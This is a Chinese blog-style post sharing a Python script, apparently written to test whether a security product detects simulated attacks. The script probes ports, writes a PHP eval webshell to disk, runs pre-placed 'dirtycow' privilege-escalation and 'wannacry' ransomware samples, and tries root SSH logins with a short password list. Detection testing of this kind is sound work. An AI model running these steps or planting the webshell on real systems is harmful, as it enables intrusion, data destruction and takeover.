功能测试脚本一例
前言:
n久之前为测试写的脚本,都已经更新几个版本了。把最简单的版本放出来。
测试要求尽量少用第三方库。
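# coding:utf-8
"""Functional test script that replays a fixed checklist of attacker-like actions.

The steps are: TCP port probes, writing a PHP webshell file, running a local
privilege-escalation sample, SSH password logins as root, and running a
ransomware sample. Presumably each step exists so the product under test can
be checked for a matching detection; the page does not name that product.

Usage: python checklist.py -h <host> -p <directory>
The -h / -p flags themselves are not parsed; only argument positions 2 and 4
are read. The samples "dirtycow" and "wannacry" are expected to already exist
in <directory>; this script does not create them.
"""
import os
import socket
import subprocess
import sys

import paramiko


def scan_port(host):
    """Probe a fixed list of TCP ports on *host* and print the ones that accept.

    Port-scan step of the test (the original comment ties it to
    "penetration tracing"). One full TCP connect is made per port with a
    2-second timeout, so the target sees nine connection attempts from a
    single source.
    """
    ports = [21, 22, 23, 53, 139, 445, 1433, 3306, 3389]
    target_ip = socket.gethostbyname(host)
    for port in ports:
        print("port scanning is %s " % port)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            sock.settimeout(2)
            # connect_ex reports failure as an errno value instead of raising.
            if sock.connect_ex((target_ip, port)) == 0:
                # port is an int, so convert it before concatenating.
                print("open_port:" + str(port))
        finally:
            # One socket per port; close it so descriptors are not leaked.
            sock.close()


def exec_system():
    """Run three host-identification commands through the shell.

    os.system returns the exit status, so the value printed after each
    command's own output is that status, not the command's text. This
    function is not called from the __main__ block.
    """
    print(os.system('whoami'))
    # 'uname -a' is the kernel/host banner command; 'name -a' is not a command.
    print(os.system('uname -a'))
    print(os.system('cat /proc/version'))


def _run_sample(path, name):
    """Mark <path>/<name> executable and run it without going through a shell.

    The directory comes from the command line, so it is passed as an argument
    vector rather than formatted into a shell string. The path is made
    absolute so the sample is found regardless of the working directory.
    """
    target = os.path.abspath(os.path.join(path, name))
    try:
        subprocess.call(["chmod", "+x", target])
        subprocess.call([target])
    except OSError as err:
        # A missing sample must not stop the remaining checklist steps.
        print("cannot run %s: %s" % (target, err))


def get_root(path):
    """Privilege-escalation step: run the "dirtycow" sample found in *path*."""
    _run_sample(path, 'dirtycow')


def echo_webshell(path):
    """Webshell step: write a one-line PHP eval webshell to <path>/webshell.php.

    The file is left in place afterwards; nothing in this script removes it,
    so it has to be cleaned up by hand once the run has been evaluated.
    """
    path = path + '/webshell.php'
    with open(path, 'w') as f:
        f.write("<?php @eval($_POST['cmd']);?>")


def ssh_connect(host):
    """SSH login step: try a fixed two-entry password list for root on port 22.

    Every attempt is a separate authentication event on the target. Rejected
    logins and socket errors are ignored on purpose so the whole list is
    always tried.
    """
    ssh = paramiko.SSHClient()
    # AutoAddPolicy accepts any host key, so the server identity is not verified.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    password = ['toor', 'admin123']
    for pwd in password:
        try:
            ssh.connect(hostname=host, port=22, username='root',
                        password=pwd, timeout=5)
            print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
        except paramiko.AuthenticationException:
            pass
        except socket.error:
            pass
        finally:
            # Close after every attempt, not only after a successful login.
            ssh.close()


def exec_wannacry(path):
    """Ransomware step: run the "wannacry" sample found in *path*."""
    _run_sample(path, 'wannacry')


if __name__ == '__main__':
    # argv[2] and argv[4] are read below, so five entries are required.
    if len(sys.argv) < 5:
        print('argument error')
        print('example:python checklist.py -h 127.0.0.1 -p /tmp/')
        sys.exit(0)
    host = sys.argv[2]
    path = sys.argv[4]
    scan_port(host)
    echo_webshell(path)
    get_root(path)
    ssh_connect(host)
    exec_wannacry(path)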